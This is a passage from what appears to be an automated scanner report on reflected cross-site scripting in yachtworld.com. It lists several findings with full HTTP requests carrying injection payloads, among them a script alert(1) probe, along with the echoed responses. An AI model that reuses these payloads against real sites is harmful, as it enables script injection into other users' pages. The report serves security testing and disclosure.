25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:59:21 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/Power/Saltwater+Fishing/13f955"><a>032e4aebb66/1">
...[SNIP]...

3.188. http://www.yachtworld.com/boats/Power/Sport+Fishing/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/Power/Sport+Fishing/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56791"><a>5cc62e06761 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/Power/Sport+Fishing/156791"><a>5cc62e06761 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:59:30 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/Power/Sport+Fishing/156791"><a>5cc62e06761/1">
...[SNIP]...

3.189. http://www.yachtworld.com/boats/Power/Trawler/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/Power/Trawler/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 372ce"><a>66475f64c1a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/Power/Trawler/1372ce"><a>66475f64c1a HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:00:15 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/Power/Trawler/1372ce"><a>66475f64c1a/1">
...[SNIP]...

3.190. http://www.yachtworld.com/boats/Sail/1 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/Sail/1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87ef4"><a>24280be2529 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /boats/Sail87ef4"><a>24280be2529/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:59:27 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Sail87ef4"><a>24280be2529/A-1">
...[SNIP]...

3.191. http://www.yachtworld.com/boats/Sail/Cruiser/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/Sail/Cruiser/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b74c5"><a>5815324e127 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/Sail/Cruiser/1b74c5"><a>5815324e127 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:00:28 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/Sail/Cruiser/1b74c5"><a>5815324e127/1">
...[SNIP]...

3.192. http://www.yachtworld.com/boats/category/type/Albin/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Albin/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 932cd"><script>alert(1)</script>309d892b808 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type932cd"><script>alert(1)</script>309d892b808/Albin/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2